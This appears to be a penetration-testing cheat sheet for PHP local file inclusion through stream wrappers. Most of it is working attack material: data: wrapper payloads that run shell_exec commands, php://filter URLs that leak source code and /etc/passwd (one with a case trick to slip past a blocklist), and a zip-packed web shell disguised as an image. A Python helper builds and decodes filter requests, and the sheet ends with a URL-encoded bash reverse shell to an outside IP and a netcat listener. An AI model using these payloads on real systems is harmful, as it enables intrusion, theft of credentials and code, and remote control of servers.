Data wrappers

#POC
#The data: wrapper only works in include()/require() when allow_url_include=On (Off by default since PHP 5.2); if the test string below is not reflected in the page, fall back to the php://filter, zip:// or expect:// wrappers further down

http://192.168.177.10/menu.php?file=data:text/plain,hello world

#If the test string is reflected, escalate to code execution by putting PHP inside the data: payload; the included text is parsed as PHP, so the <?php ... ?> tags are required

http://10.10.10.10/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
#dir is the Windows form; use ls -la (or id / uname -a) on Unix-like targets

#php://filter wrappers (rot13, base64)
#The filter wrapper returns the file transformed instead of executed, so index.php comes back as encoded source rather than rendered output; decode it locally to read the application code (and any credentials in it). The wrapper name is matched case-insensitively, which is what the third URL relies on to slip past a naive blocklist.

http://target.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://target.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://target.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Filters can be chained; PHP applies them left to right, so decode the response in reverse order. A deflate stage shrinks large files and further disguises the request. Note that zlib.deflate emits a raw DEFLATE stream with no zlib header, so after base64-decoding, inflate it as raw deflate rather than as a zlib or gzip stream.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
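The following is an added helper, not part of the original notes: it assembles php://filter URLs for the chains above and decodes what comes back (rot13, base64, raw deflate, in reverse order). The target URL, parameter name and SAMPLE_SOURCE are constructed assumptions; simulate_php_filters() is a local model of the three PHP filters so the decoder can be checked without a target, it is not PHP.

```python
import base64
import codecs
import urllib.parse
import zlib

# Hypothetical target and parameter names, taken from the notes above.
BASE_URL = "http://target.com/index.php"
PARAM = "page"

# Constructed stand-in for the vulnerable script's source.
SAMPLE_SOURCE = b"<?php\n$page = $_GET['page'];\ninclude($page);\n"


def build_filter_url(resource, filters, base_url=BASE_URL, param=PARAM):
    """Assemble a php://filter request. PHP applies the filters left to
    right, so the response must be decoded in the opposite order."""
    wrapper = "php://filter/" + "/".join(filters) + "/resource=" + resource
    # Keep ':' '/' '=' readable; anything else that needs it becomes %XX.
    return f"{base_url}?{param}={urllib.parse.quote(wrapper, safe=':/=')}"


def _rot13(data):
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")


def decode_filter_output(body, filters):
    """Reverse a filter chain on a response body (bytes)."""
    data = body
    for name in reversed(filters):
        if name == "convert.base64-encode":
            data = base64.b64decode(data)
        elif name == "string.rot13":
            data = _rot13(data)  # rot13 is its own inverse
        elif name == "zlib.deflate":
            # PHP's zlib.deflate writes a raw DEFLATE stream (no zlib
            # header), so a negative wbits value is required here.
            data = zlib.decompress(data, -15)
        else:
            raise ValueError("unsupported filter: " + name)
    return data


def simulate_php_filters(data, filters):
    """Constructed model of what PHP returns for the three filters above,
    so the decoder can be exercised offline. This is not PHP itself."""
    for name in filters:
        if name == "convert.base64-encode":
            data = base64.b64encode(data)
        elif name == "string.rot13":
            data = _rot13(data)
        elif name == "zlib.deflate":
            comp = zlib.compressobj(wbits=-15)
            data = comp.compress(data) + comp.flush()
        else:
            raise ValueError("unsupported filter: " + name)
    return data


if __name__ == "__main__":
    chain = ["zlib.deflate", "convert.base64-encode"]
    print(build_filter_url("/etc/passwd", chain))
    wire = simulate_php_filters(SAMPLE_SOURCE, chain)
    print(wire.decode())
    print(decode_filter_output(wire, chain).decode())
```

Against a live target, replace simulate_php_filters() with the HTTP response body; the decode order stays the same.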

#ZIP LFI wrapper (needs the zip extension; the archive can be uploaded under any extension, zip:// reads the file by content)

echo "<?php system(\$_GET['cmd']); ?>" > payload.php   # escape the $: unescaped, the shell expands $_GET to nothing and the web shell is broken
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

#%23 is a URL-encoded '#'; sent raw, the browser treats it as a fragment and the member name never reaches the server. The archive path is relative to the web server's working directory or absolute.
http://target.com/index.php?page=zip://shell.jpg%23payload.php&cmd=id

#Expect wrapper (requires the PECL expect extension, which is not installed by default; the scheme is expect://, not php:expect://)

http://target.com/index.php?page=expect://id
http://target.com/index.php?page=expect://ls

#experiment with other commands

#Assorted commands

#Windows
......file=data:text/plain,<?php echo shell_exec("dir") ?>

#Useful whenever a PHP application passes user input to include/require and allow_url_include is on, regardless of the web server in front of it (Apache mod_php, nginx with php-fpm): nothing has to be written to disk, the PHP travels inside the request itself

#Insert
data://text/plain,<?php phpinfo(); ?>
in place of the included filename (PHP accepts both data: and data://). phpinfo() confirms execution and shows allow_url_include, disable_functions and the web server user before you commit to a command-execution function

EG:
http://10.11.1.35/section.php?page=data://text/plain,<?php phpinfo(); ?>


#Variants (enumerate the host and the interpreters present before picking a reverse shell; if shell_exec is in disable_functions, try system, passthru or proc_open)
......page=data:text/plain,<?php echo shell_exec("ls -la") ?>
......page=data:text/plain,<?php echo shell_exec("whoami") ?>
......page=data:text/plain,<?php echo shell_exec("uname -a") ?>
......page=data:text/plain,<?php echo shell_exec("which bash") ?>
......page=data:text/plain,<?php echo shell_exec("which python") ?>
......page=data:text/plain,<?php echo shell_exec("which curl") ?>

#Getting a shell
Insert a URL-encoded bash reverse shell (............) as the shell_exec() argument

10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec(".......................") ?>

#Bash revshell
bash -i >& /dev/tcp/192.168.119.177/1234 0>&1
#shell_exec() hands the string to /bin/sh; where /bin/sh is dash (Debian, Ubuntu) the >& redirection to a path is rejected as a bad fd number, so wrap the whole one-liner in bash -c '...' before encoding it

#Encoded (+ for space is decoded by PHP in a query string; %20 works too)
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261

#Final
10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec("bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261") ?>

#Listener (start it before sending the final request)
nc -nvlp 1234

#Shell
The connection arrives on the listener as the web server user (www-data or similar); confirm with id
